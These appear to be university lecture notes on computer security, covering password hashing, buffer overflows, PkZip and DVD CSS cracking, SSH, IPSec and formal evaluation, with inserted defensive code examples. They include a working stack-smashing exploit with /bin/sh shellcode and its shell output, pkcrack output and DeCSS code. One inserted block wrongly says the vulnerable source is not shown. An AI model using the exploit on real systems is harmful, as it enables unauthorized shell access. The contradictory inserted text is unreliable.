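    for (i = 0; i < 8; i++) tail[lenpos + i] = (uint8_t)(bits >> (8 * i));
    md4_block(st, tail);
    if (lenpos == 120) md4_block(st, tail + 64);
    for (i = 0; i < 16; i++) out[i] = (uint8_t)(st[i / 4] >> (8 * (i % 4)));
}

#define MAX_PW 127   /* this example's own limit on password length */

/* NT hash as 32 lowercase hex characters.  ASCII passwords are assumed, so
   the "Unicode version" is each character followed by a zero byte. */
int nt_hash_hex(const char *password, char hex[33])
{
    uint8_t wide[2 * MAX_PW], digest[16];
    size_t n = strlen(password), i;
    if (n > MAX_PW) return -1;
    for (i = 0; i < n; i++) { wide[2 * i] = (uint8_t)password[i]; wide[2 * i + 1] = 0; }
    md4(wide, 2 * n, digest);
    for (i = 0; i < 16; i++) sprintf(hex + 2 * i, "%02x", digest[i]);
    return 0;
}

/* 1 if the NT hash of password equals expected_hex (lowercase), else 0. */
int nt_hash_is(const char *password, const char *expected_hex)
{
    char hex[33];
    return nt_hash_hex(password, hex) == 0 && strcmp(hex, expected_hex) == 0;
}

/* With no salt, equal passwords give equal stored hashes, so an auditor can
   spot reused passwords from the hashes alone.  Returns how many of the
   entries share a hash with at least one other entry (at most 64 entries). */
int accounts_with_shared_hash(const char *const *passwords, int n)
{
    char hex[64][33];
    int i, j, shared = 0;
    if (n > 64) return -1;
    for (i = 0; i < n; i++)
        if (nt_hash_hex(passwords[i], hex[i]) != 0) return -1;
    for (i = 0; i < n; i++)
        for (j = 0; j < n; j++)
            if (i != j && strcmp(hex[i], hex[j]) == 0) { shared++; break; }
    return shared;
}

int main(void)
{
    /* constructed sample: three accounts, two of which reuse "password" */
    const char *const sample[] = {"password", "Summer03", "password"};
    char hex[33];
    nt_hash_hex("password", hex);
    printf("NT hash of \"password\": %s\n", hex);
    printf("accounts sharing a hash: %d\n", accounts_with_shared_hash(sample, 3));
    return 0;
}
```

Contrast this with the UNIX scheme two slides back: there, the same check would need one encryption per account because each entry carries its own salt; here one MD4 per candidate covers the whole SAM.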
NT Password security
Note that the LanManager hash is similar to the UNIX level of cryptography.
The NT hash is better.
But... neither uses strong encryption, and
the network login mechanism has some problems.
Challenge response
[Figure: login network traffic between CLIENT and PDC, with a bad guy snooping on the wire.]
Challenge-response protocol
When a client wishes to use a resource, it first requests a connection and negotiates the protocol that the client and server will use.
In the reply to this request the server generates and appends an 8 byte random value. This is stored in the server after the reply is sent and is known as the challenge.
It is different for every client connection.
Challenge-response protocol
The client then uses the hashed password (the 16 byte values described above), appended with 5 null bytes, as three 56 bit DES keys, each of which is used to encrypt the 8 byte challenge value, forming a 24 byte value known as the response.
This calculation is done on both hashes of the user's password, and both responses are returned to the server, giving two 24 byte values.
Challenge-response protocol
The server then reproduces the above calculation, using its own value of the 16 byte hashed password and the challenge value that it kept during the initial protocol negotiation.
It then checks to see if the 24 byte value it calculates matches the 24 byte value returned to it from the client.
If these values match exactly, then the client knew the correct password and is allowed access.
Challenge-response protocol
There are good points about this:
• The server never knows or stores the cleartext of the user's password - just the 16 byte hashed values derived from it.
• The cleartext password or 16 byte hashed values are never transmitted over the network - thus increasing security.
Challenge-response protocol
However, there is also a bad side:
• The 16 byte hashed values are a "password equivalent". You cannot derive the user's password from them, but they can be used in a modified client to gain access to a server.
• The initial protocol negotiation is generally insecure, and can be hijacked in a range of ways. One common hijack involves convincing the server to allow clear-text passwords.
Challenge-response protocol
Despite functionality added to NT to protect against unauthorized access to the SAM, the mechanism is trivially insecure.
Both the hashed values can be retrieved using the network sniffer mentioned before, and they are as good as passwords.
Attack
Relies on a flawed mechanism.
Even without network access, it is possible by various means to access the SAM password hashes, and with network access it is easy.
The hashed values are password equivalents, and may be used directly if you have modified client software.
The attack considered here is the use of either a dictionary or brute force attack directly on the password hashes (which must first be collected somehow).
Attack
L0phtCrack is a tool for turning Microsoft LanManager and NT password hashes back into the original clear text passwords. It may be configured to run in different ways.
Dictionary cracking: L0phtCrack running on a Pentium Pro 200 checked a password file with 100 passwords against an 8 Megabyte (about 1,000,000 word) dictionary file in under one minute.
Brute force: L0phtCrack running on a Pentium Pro 200 checked a password file with 10 passwords using the alpha character set (A-Z) in 26 hours.
Attack time
Character set size   Size of computation   Relative time taken
26                   8.353 × 10^9          1.00
36                   8.060 × 10^10         9.65
46                   4.455 × 10^11         53.33
68                   6.823 × 10^12         816.86
So if 26 characters takes 26 hours to complete, a worst-case scenario for 36 characters (A-Z, 0-9) would take 250 hours or 10.5 days. A password such as take2asp1r1n would probably be computed in about 7 days.
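The slide does not say how the "size of computation" column was obtained. As an added example (not from the notes), the C below reproduces all four figures under the assumption that the column counts every candidate string of length 1 to 7 over the character set, that is, one 7-character half of a LanManager password as described on the "LanManager encryption" slide, and it scales the measured 26 hours by the resulting ratio. Function names are this example's own.

```c
#include <stdio.h>
#include <stdint.h>

/* Added example, not the lecture's code.  Assumption: the table counts all
   strings of length 1..7 over the character set (one LM half). */

#define HALF_LEN 7

/* Number of candidate strings of length 1..HALF_LEN over a charset,
   i.e. charset + charset^2 + ... + charset^HALF_LEN. */
uint64_t lm_half_keyspace(unsigned charset)
{
    uint64_t total = 0, term = 1;
    int len;
    for (len = 1; len <= HALF_LEN; len++) {
        term *= charset;        /* term is now charset^len */
        total += term;
    }
    return total;
}

/* Time relative to the 26-letter alphabet, as in the table's last column. */
double relative_time(unsigned charset)
{
    return (double)lm_half_keyspace(charset) / (double)lm_half_keyspace(26);
}

/* Scale the measured time for A-Z (26 hours on the slide) to another set. */
double hours_for(unsigned charset, double hours_for_26)
{
    return hours_for_26 * relative_time(charset);
}

int main(void)
{
    static const unsigned sets[] = {26, 36, 46, 68};
    size_t i;
    printf("%-8s %-16s %-10s %s\n", "charset", "candidates", "relative", "hours");
    for (i = 0; i < sizeof sets / sizeof sets[0]; i++)
        printf("%-8u %-16llu %-10.2f %.1f\n", sets[i],
               (unsigned long long)lm_half_keyspace(sets[i]),
               relative_time(sets[i]), hours_for(sets[i], 26.0));
    return 0;
}
```

The 36-character row comes out at about 250.9 hours, matching the slide's "250 hours or 10.5 days"; the point for a defender is how steeply the last column grows once the full printable set (68) is in use, which is why item 4 of the fix list below asks for all allowable characters.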
Microsoft base security fix
1. Disable the use of LanManager passwords.
2. Don’t log in over network as administrator
3. Encrypt all network traffic
4. Use long passwords, and all allowable characters
5. Use an alternative login system
6. Use an unsniffable network cabling system.
Chapter 10
Lecture 10 - More (in)security
Last session
• Ethics and computing
• Organizations and standards
• UNIX passwords
• NT passwords
This session
• Buffer overflow attacks
• PkZip attack
• DVDs and the CSS
• SSH and SSL
• PGPfone
Buffer overflow
Most well known compromise of computer systems.
One of a general class of problems caused by software that does not check its parameters for extreme values.
Buffer overflow
Examine the way programs use memory.
Presentation based on
http://destroy.net/machines/security/P49-14-Aleph-One
Simple Program
```c
#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char buffer[512];

    printf("Argument is %s\n", argv[1]);
    strcpy(buffer, argv[1]);   /* no length check: a long argument overruns buffer */
    return 0;
}
```
CODE LISTING vulnerable.c
Simple Program
When we run it:
[hugh@pnp176-44 programs]$ ./vulnerable test
Argument is test
[hugh@pnp176-44 programs]$ ./vulnerable "A Longer Test"
Argument is A Longer Test
[hugh@pnp176-44 programs]$
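Added example (not code from the lecture or from the Aleph One paper it is based on): the unchecked copy from vulnerable.c beside a bounded version that refuses any argument which does not fit in the 512-byte buffer, NUL terminator included. Function names and the constructed oversized input are this example's own.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not the lecture's code: the copy in vulnerable.c beside a
   bounded replacement.  Function names are this example's own. */

#define BUFFER_SIZE 512

/* The pattern in vulnerable.c: nothing stops src being longer than dst, so
   the surplus bytes run past the end of dst into whatever the stack holds
   next (saved registers, the return address).  Kept only for comparison;
   never call it with input whose length has not been checked. */
void copy_unchecked(char *dst, const char *src)
{
    strcpy(dst, src);
}

/* Bounded replacement: copies src only if it fits in dst, NUL included, and
   otherwise leaves dst as an empty string.  memchr limits the scan of src to
   dstsz bytes, so even an unterminated src is not read past that point.
   Returns 0 on success, -1 if the input was rejected. */
int copy_checked(char *dst, size_t dstsz, const char *src)
{
    const char *end;
    if (dstsz == 0) return -1;
    end = memchr(src, '\0', dstsz);
    if (end == NULL) { dst[0] = '\0'; return -1; }  /* would need >= dstsz bytes */
    memcpy(dst, src, (size_t)(end - src) + 1);
    return 0;
}

/* What vulnerable.c's main() should do with argv[1]: the same 512-byte stack
   buffer, but filled only after the length check.  Returns 1 if the argument
   was accepted, 0 if it was rejected as too long. */
int handle_argument(const char *arg)
{
    char buffer[BUFFER_SIZE];
    if (copy_checked(buffer, sizeof buffer, arg) != 0) {
        fprintf(stderr, "argument too long (limit %d bytes)\n", BUFFER_SIZE - 1);
        return 0;
    }
    printf("Argument is %s\n", buffer);
    return 1;
}

int main(int argc, char *argv[])
{
    char big[600];                       /* constructed oversized input */
    memset(big, 'd', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    handle_argument(argc > 1 ? argv[1] : "test");   /* accepted */
    handle_argument(big);                           /* rejected */
    return 0;
}
```

Note that swapping `strcpy` for `strncpy` would not be a fix on its own: `strncpy` does not terminate the copy when the source fills the buffer, so the check has to come before the copy, as above, and the longest accepted argument is 511 characters.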
Simple program
[Figure: the computer's memory. The stack grows down; the stack frame holds the arguments, the return address and the local variables, including the 512-byte buffer.]
Smashing the stack!
[Figure: smashing the stack. The same memory layout, with the stack growing down and the frame holding the arguments, the return address and the variables.]
Working and not working!
[hugh@pnp176-44 programs]$ ./vulnerable ddddd
Exploit...
```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define DEFAULT_OFFSET       0
#define DEFAULT_BUFFER_SIZE  512
#define NOP                  0x90

char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_sp(void)
{
    __asm__("movl %esp,%eax");
}

int main(int argc, char *argv[])
{
    char *buff, *ptr;
    long *addr_ptr, addr;
    int offset = DEFAULT_OFFSET, bsize = DEFAULT_BUFFER_SIZE;
    int i;

    if (argc > 1) bsize = atoi(argv[1]);
    if (argc > 2) offset = atoi(argv[2]);

    if (!(buff = malloc(bsize))) {
        printf("Can't allocate memory.\n");
        exit(0);
    }

    addr = get_sp() - offset;
    printf("Using address: 0x%x\n", addr);

    /* fill the buffer with the guessed address ... */
    ptr = buff;
    addr_ptr = (long *) ptr;
    for (i = 0; i < bsize; i += 4)
        *(addr_ptr++) = addr;

    /* ... then NOPs in the first half and the shellcode in the middle */
    for (i = 0; i < bsize / 2; i++)
        buff[i] = NOP;

    ptr = buff + ((bsize / 2) - (strlen(shellcode) / 2));
    for (i = 0; i < strlen(shellcode); i++)
        *(ptr++) = shellcode[i];

    buff[bsize - 1] = '\0';

    /* export the buffer as the environment variable EGG */
    memcpy(buff, "EGG=", 4);
    putenv(buff);
    system("/bin/bash");
    return 0;
}
```
CODE LISTING exploit3.c
Exploit
```
[hugh@pnp176-44 programs]$ ./exploit3 560
Using address: 0xbfffe998
[hugh@pnp176-44 programs]$ ./vulnerable $EGG
Argument is ????????...???????
sh-2.05b$
```
We are now within the vulnerable program's process, but running the sh shell program instead of the vulnerable program.
Using the buffer overflow attack
A server (say a web server) that expects a query, and returns a response.
A CGI/ASP or perl script inside a web server
A SUID root program on a UNIX system
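The slides do not show the source of the `vulnerable` program. As an added example (not the course's own code), here is a reconstruction of the defect it demonstrates, a fixed-size stack buffer filled by `strcpy`, beside a hardened version that bounds the copy and rejects over-long input instead of overwriting the return address. The function names and the buffer size are assumptions.

```c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#define ARG_BUF 64   /* assumed size of the fixed stack buffer */

/* Unsafe: strcpy copies until the NUL of the argument, however long it is.
 * An argument longer than the buffer overwrites what lies above buf on the
 * stack (saved registers, then the return address): "smashing the stack". */
void vulnerable_echo(const char *arg)
{
    char buf[ARG_BUF];
    strcpy(buf, arg);               /* no bound: this is the defect */
    printf("Argument is %s\n", buf);
}

/* Hardened helper: the copy is bounded by the destination capacity, the
 * result is always NUL-terminated, and input that does not fit is refused
 * rather than silently truncated. Returns 0 on success, -1 if too long. */
int safe_copy_arg(char *dst, size_t cap, const char *src)
{
    size_t len = strlen(src);
    if (cap == 0)
        return -1;
    if (len >= cap) {               /* must leave room for the terminating NUL */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, len + 1);      /* copies the NUL as well */
    return 0;
}

/* Hardened echo: same observable behaviour for well-formed input,
 * a clean error (exit status 1) for input that would have overflowed. */
int safe_echo(const char *arg)
{
    char buf[ARG_BUF];
    if (safe_copy_arg(buf, sizeof buf, arg) != 0) {
        fprintf(stderr, "Argument too long (max %zu bytes)\n", sizeof buf - 1);
        return 1;
    }
    printf("Argument is %s\n", buf);
    return 0;
}

int main(int argc, char *argv[])
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s <argument>\n", argv[0]);
        return 2;
    }
    return safe_echo(argv[1]);      /* ./safe_echo ddddd  -> "Argument is ddddd" */
}
```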
Example attack - Blaster
Recently we have been having a series of attacks on Microsoft systems that are based on various buffer overflow problems.
The Blaster worm is described in the CERT advisory "CA-2003-20 W32/Blaster worm":
The W32/Blaster worm exploits a vulnerability in Microsoft's DCOM RPC interface as described in VU#568148 and CA-2003-16. Upon successful execution....
Example attack - CRC-32 on ssh
http://razor.bindview.com/publish/advisories/adv_ssh1crc.html
This session
• Buffer overflow attacks
• PkZip attack
• DVDs and the CSS
• SSH and SSL
• PGPfone
PkZip stream cipher
PkZip is for compressing files
PkZip can also scramble files when given a secret password.
Enciphering strategy is weak and can be cracked
http://citeseer.nj.nec.com/122586.html
Weakness in the (homegrown) ciphering algorithm
PkZip stream cipher
```
opo 144% pkcrack -C all.zip -c readme.doc -P plain.zip -p readme.doc
Files read. Starting stage 1 on Wed Sep 8 09:04:02 1999
Generating 1st generation of possible key2_421 values...done.
Found 4194304 possible key2-values.
Now we're trying to reduce these...
Done. Left with 18637 possible Values. bestOffset is 24.
Stage 1 completed. Starting stage 2 on Thu Sep 9 09:12:06 1999
Ta-daaaaa! key0=dda9e469, key1=96212999, key2=f9fc9651
Probabilistic test succeeded for 402 bytes.
Stage2 completed. Starting password search on Thu Sep 9 09:22:22 1999
Key: 73 65 63 72 65 74
Or as a string: 'secret' (without the enclosing single quotes)
Finished on Thu Sep 9 10:54:22 1999
opo 145% ./zipdecrypt dda9e469 96212999 f9fc9651 all.zip rr.zip
opo 146%
```
rr.zip contains the unencrypted version of the archive.
PkZip stream cipher fix
The PkZip stream cipher is also susceptible to dictionary attacks, and so it is considered not suitable for secure encryption of data. The fix is:
Don’t use PkZip for security purposes.
DVD security
Content Scrambling System - data encryption scheme
Developed by commercial interests to stop copying... but
Easy to copy a DVD, but CSS prevents decrypting, changing and re-recording.
Details are trade secret.
Master set of 400 keys is stored on every DVD, and the DVD player uses these to generate a key needed to decrypt data from the disc.
DVD security
Linux users were excluded from access to CSS licenses because of the open-source nature of Linux.
In October 1999, hobbyists/hackers in Europe cracked the CSS algorithm.
DVD industry players have been trying to prevent distribution of any software.
The source code for decoding DVD is available on a T-shirt.
DVD security
The lesson to learn from this is that, once again, security through obscurity is a very poor strategy.
The source code and detailed descriptions for a CSS descrambler are available at:
http://www-2.cs.cmu.edu/~dst/DeCSS/Gallery/
DVD security
Description of the key/descrambling process:
First one must have a master key, which is unique to the DVD player manufacturer. It is also known as a player key. The player reads an encrypted disk key from the DVD, and uses its player key to decrypt the disk key. Then the player reads the encrypted title key for the file to be played. (The DVD will likely contain multiple files, typically 4 to 8, each with its own title key.) It uses the decrypted disk key (DK) to decrypt the title key. Finally, the decrypted title key, TK, is used to descramble the actual content.
DVD security
Confusion and diffusion...
```c
#define m(i)(x[i]^s[i+84])<<
unsigned char x[5],y,s[2048];main(n){for(read(0,x,5);read(0,s,n=2048);write(1,s,n))
if(s[y=s[13]%8+20]/16%4==1){int i=m(1)17^256+m(0)8,k=m(2)0,j=m(4)17^m(3)9^k*2-k%8^8,
a=0,c=26;for(s[y]-=16;--c;j*=2)a=a*2^i&1,i=i/2^j&1<<24;for(j=127;++j<n;c=c>y)
c+=y=i^i/8^i>>4^i>>12,i=i>>8^y<<17,a^=a>>14,y=a^a*8^a<<6,a=a>>8^y<<9,k=s[j],
k="7Wo~'G_\216"[k&7]+2^"cr3sfw6v;*k+>/n."[k>>4]*2^k*257/8,s[j]=k^(k&k*2&34)*6^c+~y;}}
```
ssh
For logging in to a remote machine.
Has secure encrypted communications, and...
You can’t snoop or sniff passwords.
TCP/IP connections can be forwarded over the secure channel.
ssh - proving identity
1. /etc/hosts.equiv: same user name? OK - log in!
2. ~/.rhosts: by user? OK - log in!
3. RSA: authentication using public-key cryptography.
4. TIS: trusted server to authenticate the user.
5. Passwords: password sent encrypted...
RSA key management
The file ~/.ssh/authorized_keys lists the public keys for logging in.
• Initially: the ssh program tells the server which key pair it would like to use.
• Challenge: the server sends a challenge encrypted with the public key.
• Decrypt: the client decrypts using the private key. The challenge is returned as proof.
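The three steps above, worked through as an added example (not from the slides) with textbook RSA on tiny numbers: the server encrypts a challenge under the public key it finds in authorized_keys, the client recovers it with the private key, and the server accepts only if the returned value matches. The key values, function names and the bare "return the decrypted challenge" proof are constructed simplifications; real SSH uses large keys, padding and a hash of the challenge.

```c
#include <stdint.h>
#include <stdbool.h>
#include <stdio.h>

typedef struct { uint64_t n, e; } rsa_pub;   /* what the server stores in authorized_keys */
typedef struct { uint64_t n, d; } rsa_priv;  /* what only the client holds */

/* Square-and-multiply modular exponentiation; operands stay far below 2^32,
 * so the intermediate products cannot overflow a uint64_t. */
static uint64_t modpow(uint64_t base, uint64_t exp, uint64_t mod)
{
    uint64_t result = 1;
    base %= mod;
    while (exp) {
        if (exp & 1) result = result * base % mod;
        base = base * base % mod;
        exp >>= 1;
    }
    return result;
}

/* Server: encrypt the freshly chosen challenge with the client's public key.
 * Only this ciphertext crosses the network, so a snooper learns nothing usable. */
uint64_t server_make_challenge(const rsa_pub *pub, uint64_t challenge)
{
    return modpow(challenge, pub->e, pub->n);
}

/* Client: recover the challenge with the private key, which never leaves the client. */
uint64_t client_answer(const rsa_priv *priv, uint64_t encrypted)
{
    return modpow(encrypted, priv->d, priv->n);
}

/* Server: the proof is accepted only if it equals the challenge it chose. */
bool server_verify(uint64_t challenge, uint64_t answer)
{
    return challenge == answer;
}

/* One complete round: true iff the client's private key matches the listed public key.
 * A fresh random challenge per round is what stops an old answer being replayed. */
bool rsa_auth_round(const rsa_pub *listed, const rsa_priv *client_key, uint64_t challenge)
{
    uint64_t encrypted = server_make_challenge(listed, challenge);
    uint64_t answer    = client_answer(client_key, encrypted);
    return server_verify(challenge, answer);
}

int main(void)
{
    /* constructed textbook key: p = 61, q = 53, n = 3233, e = 17, d = 2753 */
    rsa_pub  pub   = { 3233, 17 };
    rsa_priv priv  = { 3233, 2753 };
    rsa_priv wrong = { 3233, 2751 };   /* a client holding the wrong private key */
    uint64_t challenge = 1234;         /* would be random in practice; must be < n */

    printf("right key: %s\n", rsa_auth_round(&pub, &priv,  challenge) ? "accepted" : "rejected");
    printf("wrong key: %s\n", rsa_auth_round(&pub, &wrong, challenge) ? "accepted" : "rejected");
    return 0;
}
```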
Port forwarding
Secure shell supports TCP/IP port forwarding
For example, if we wanted to use a secure channel to our X display on the local machine, the proxy listens for connections on a port, forwards the connection request and any data over the secure channel, and makes a connection to the real X display from the SSH terminal.
Secure Sockets Layer (SSL)
Netscape has a protocol for data security - uses 128-bit keys.
data encryption, server authentication, message integrity, and optional client authentication
SSL is an open, nonproprietary protocol
UN-SSL
Netscape weakly seeds a random number generator
Someone who can snoop the network and has access to an account can discover the seed.
Expected search space similar to brute-forcing a 40-bit key.
PGPfone
Speech compression and strong cryptography
Available in two versions:
1. An international version available outside America, and a prohibited import into America.
2. An American version available inside America, and a prohibited export out of America.
These two versions are also exactly the same! Restrictions on the import and export of munitions - strong cryptography is considered a munition.
PGPfone
Familiar encryption and key exchange parameters:
When initially setting up a link, Diffie-Hellman key exchange is used to ensure safety in the choice of an encryption key.
Chapter 11
Lecture 11 - Security
Last session
• Buffer overflow attacks
• PkZip attack
• DVDs and the CSS
• SSH and SSL
• PGPfone
This session
• Design principles
• Biometrics
• IPSec
• Formal methods
• Formal evaluation
• Exam
Design principles
Paper by Saltzer and Schroeder, summarized below:
• Economy of mechanism: Keep the design as simple and small as possible. (identd assumption)
• Fail-safe defaults: Base access decisions on permission rather than exclusion. This is conservative design. (mail server - mail only access)
• Complete mediation: Every access to every object must be checked for authority. (DNS cache poisoning)
Design principles
• Open design: The design should not be secret. (DVDs, Microsoft SAM hashes...)
• Separation of privilege: Two keys are better than one. No single event can compromise the system. (su - password and wheel group)
• Least privilege: Every program and every user of the system should operate using the least set of privileges necessary to complete the job. (Military need-to-know)
Design principles
• Least common mechanism: Minimize the amount of mechanism common to more than one user and depended on by all users. (supervisor or library)
• Psychological acceptability: The human interface should be easy to use.
In the textbook there are examples of the use of each of these design principles.
Biometrics
Biometrics is the use of human physical characteristics to support authentication.
Biometrics - eyes
Minimal hardware biometrics
Voices - Record and process voice, leading to either speaker verification or recognition.
Faces - Capture either a static or moving image of a face.
Keystrokes - Capture a sequence of keystrokes, recording timing.
Combinations of characteristics may be used, but in general biometric techniques are not reliable on their own. They make a good second key for separation of privilege.
IPSec
IPSec is a set of standards intended to support communication security between networked computers, particularly in the newer IPv6 (IP Next-Generation) network.
IPSec software is available in Windows 2000, Linux, and on routers on the Internet.
http://www.faqs.org/rfcs/rfc2401.html
IPSec may be used in a range of ways.
IPSec VPN
[Figure: an IPSec VPN carried across an ISP's network]
IPSec point-to-point
IPSec network-to-network
IPSec headers
There are two types of header, one used for authentication, and the other used for encryption:
1. AH - the Authentication Header, for data integrity, anti-replay and authentication.
2. ESP - the Encapsulating Security Payload header, for confidentiality. ESP can also provide AH services.
Communicating parties agree on a Security Association (SA), one SA for each direction, and one SA for each type of communication.
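The anti-replay service listed for AH above is the part of this slide that is easiest to get wrong, so here it is as an added example (not from the slides or any IPSec implementation): the sliding-window check described in RFC 2401 Appendix C, with one window per inbound SA. The names and the 32-packet window are assumptions; the check is meant to run only after the packet's integrity check has passed, so that forged sequence numbers cannot disturb the window.

```c
#include <stdint.h>
#include <stdbool.h>
#include <stdio.h>

#define REPLAY_WINDOW 32u   /* RFC 2401 requires a window of at least 32 */

/* Per-SA receive state. Since an SA is one-directional, the sender's
 * sequence numbers on it are strictly increasing: 1, 2, 3, ... */
typedef struct {
    uint32_t last_seq;   /* highest sequence number accepted so far */
    uint32_t bitmap;     /* bit i set => sequence number (last_seq - i) was accepted */
} replay_state;

void replay_init(replay_state *st)
{
    st->last_seq = 0;
    st->bitmap   = 0;
}

/* Returns true if seq is new (it is recorded), false if the packet should be
 * dropped: a duplicate inside the window, or one older than the window. */
bool replay_accept(replay_state *st, uint32_t seq)
{
    if (seq == 0)
        return false;                                  /* 0 is never sent on an SA */

    if (seq > st->last_seq) {                          /* newer than anything seen */
        uint32_t diff = seq - st->last_seq;
        if (diff >= REPLAY_WINDOW)
            st->bitmap = 1u;                           /* jump: whole window is fresh */
        else
            st->bitmap = (st->bitmap << diff) | 1u;    /* slide the window forward */
        st->last_seq = seq;
        return true;
    }

    uint32_t diff = st->last_seq - seq;                /* how far behind the right edge */
    if (diff >= REPLAY_WINDOW)
        return false;                                  /* too old: left of the window */
    uint32_t bit = 1u << diff;
    if (st->bitmap & bit)
        return false;                                  /* already accepted: a replay */
    st->bitmap |= bit;                                 /* late but genuine: record it */
    return true;
}

/* Run a trace of received sequence numbers through one SA and count the drops. */
int count_replay_drops(const uint32_t *seqs, int n)
{
    replay_state st;
    int drops = 0;
    replay_init(&st);
    for (int i = 0; i < n; i++)
        if (!replay_accept(&st, seqs[i]))
            drops++;
    return drops;
}

int main(void)
{
    /* constructed trace: in-order packets, a re-sent copy of 2, packets 4 and 5
     * reordered, a duplicate of 4, a large jump, then a packet from before the window */
    const uint32_t trace[] = { 1, 2, 3, 2, 5, 4, 4, 40, 3 };
    replay_state st;
    replay_init(&st);
    for (size_t i = 0; i < sizeof trace / sizeof trace[0]; i++)
        printf("seq %2u: %s\n", (unsigned) trace[i],
               replay_accept(&st, trace[i]) ? "accept" : "DROP");
    return 0;   /* three of the nine packets are dropped */
}
```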
Modes of operation
• An end-to-end SA - Transport mode
[Figure: transport-mode packet layouts.
 AH:  Original IPv6 hdr | AH | Transport segment         (whole packet authenticated)
 ESP: Original IPv6 hdr | ESP | Transport segment | ESP  (segment encrypted; ESP portion authenticated)]
Modes of operation
• An SA between security gateways - Tunnel mode
[Figure: tunnel-mode packet layouts.
 AH:  New IPv6 hdr | AH | Original IPv6 hdr | Transport segment         (whole packet authenticated)
 ESP: New IPv6 hdr | ESP | Original IPv6 hdr | Transport segment | ESP  (original packet encrypted; ESP portion authenticated)]
SAs form a kind of distributed database.
Formal methods
FM encompasses a wide range of techniques...
Model checking:
constructing formal models, with appropriate formal specifications.
An example is Promela and Spin.
Promela and spin
The language Promela is 'C' like, with an initialization procedure. It can model asynchronous or synchronous, deterministic or non-deterministic systems.
Spin is the checker for Promela models
Assertions to test correctness of model:
assert(some boolean condition);
If the condition is not TRUE then the assertion is violated.
Temporal claims
We got here again without making any progress!
The support for temporal claims takes the form of:
• Endstate labels - for determining valid endstates
• Progress labels - claim no non-progress cycles
• Never claims - impossible temporal assertions
Simple example
[Figure: two protocol entities A and B connected by the channels AtoB and BtoA; A talks to its application over Ain/Aout, B over Bin/Bout]
Promela example
```promela
init
{
  chan AtoB = [1] of { mtype,byte };
  chan BtoA = [1] of { mtype,byte };
  chan Ain  = [2] of { mtype,byte };
  chan Bin  = [2] of { mtype,byte };
  chan Aout = [2] of { mtype,byte };
  chan Bout = [2] of { mtype,byte };
  atomic {
    run application( Ain,Aout );
    run transfer( Aout,Ain,BtoA,AtoB );
    run transfer( Bout,Bin,AtoB,BtoA );
    run application( Bin,Bout )
  };
  AtoB!err(0)
}
```
Promela example
```promela
#define MAX 10
mtype = { ack, nak, err, next, accept };

proctype transfer( chan in, out, chin, chout )
{
  byte o,i;
  in?next(o);
  do
  :: chin?nak(i) -> out!accept(i); chout!ack(o)
  :: chin?ack(i) -> out!accept(i); in?next(o); chout!ack(o)
  :: chin?err(i) -> chout!nak(o)
  od
}
```
Promela example
```promela
proctype application( chan in, out )
{
  int i=0, j=0, last_i=0;
  do
  :: in?accept(i) ->
       assert( i==last_i );
       if
       :: (last_i!=MAX) -> last_i = last_i+1
       :: (last_i==MAX)
       fi
  :: out!next(j) ->
       if
       :: (j!=MAX) -> j=j+1
       :: (j==MAX)
       fi
  od
}
```
Spin simulation
Formal evaluation - TCSEC
TCSEC (the Orange Book) was the first rating system for the security of products. It defined six different evaluation classes. The classes are:
• C1 - For same-level security access. Not currently used.
• C2 - Controlled access protection - users are individually accountable for their actions. Most OS manufacturers have C2 versions of the OS.
• B1 - Mandatory BLP policies - for more secure systems handling classified data.
Formal evaluation - TCSEC
• B2 - Structured protection - mandatory access control for all objects in the system. Formal models.
• B3 - Security domains - more controls, minimal complexity, provable consistency of the model.
• A1 - Verified design - consistency proofs between model and specification.
Formal evaluation - ITSEC
Derived from the Dutch, English, French and German national security evaluation criteria.
Adaptable.
The sponsor determines the operational requirements, threats and security objectives.
ITSEC specifies the interactions and documents between the sponsor and the evaluator.
ITSEC
Again there are various levels of evaluation, E0..E6, with E6 giving the highest level of assurance - it requires two independent formal verifications.
First certification of a smart-card system under E6.
The smart-cards are electronic purses - that is, they carry value, so forgery must be impossible.
The certification encompassed the communication with the card, as well as the software within the card and at the bank.
Data Diode E6, BLP
[Figure: a data diode placed between a high-security domain and a low-security domain, permitting flow in one direction only]
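As an added example (not from the lecture notes), here is a small Python model of the two BLP properties applied to the two domains in the diagram, with the data diode modelled as a one-way Low to High link; the level names and function names are assumed for illustration.

```python
# Added example, not the lecturer's code: a tiny Bell-LaPadula (BLP)
# reference monitor for the two domains of the data-diode slide.
# The lattice is a constructed two-level linear order; real BLP labels
# also carry category sets.
LEVELS = {"Low": 0, "High": 1}


def dominates(a, b):
    """True when level a is at least as high as level b."""
    return LEVELS[a] >= LEVELS[b]


def may_read(clearance, classification):
    """Simple security property: no read up."""
    return dominates(clearance, classification)


def may_write(clearance, classification):
    """*-property: no write down (writes go at or above the clearance)."""
    return dominates(classification, clearance)


def blp_flow_allowed(src, dst):
    """Information can move from src to dst only if some subject may read
    an object at src and write an object at dst.  Under BLP this collapses
    to: dst dominates src."""
    return any(may_read(c, src) and may_write(c, dst) for c in LEVELS)


def diode_permits(src, dst):
    """A data diode is a physically one-way link: Low -> High passes,
    High -> Low cannot happen.  Same-domain traffic never crosses it."""
    return (src, dst) == ("Low", "High")


def check_diode_against_blp():
    """Map each cross-domain direction to (diode verdict, BLP verdict).
    A diode enforces BLP correctly when the two verdicts always agree."""
    results = {}
    for src in LEVELS:
        for dst in LEVELS:
            if src != dst:
                results[(src, dst)] = (diode_permits(src, dst),
                                       blp_flow_allowed(src, dst))
    return results


if __name__ == "__main__":
    for (src, dst), (diode, blp) in check_diode_against_blp().items():
        print(f"{src:>4} -> {dst:<4} diode={diode!s:5} blp={blp}")
```

The point of the check is that the diode's hardware behaviour coincides exactly with the flows BLP permits between the two domains, which is why a diode can carry a high assurance rating with a very small trusted computing base.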
This session
• Design principles
• Biometrics
• IPSec
• Formal methods
• Formal evaluation
• Exam
Exam
You can expect 12 pages - write on paper. Marks out of 50.
10 short answer questions worth 1 mark each.
Longer questions on:
• Encryption
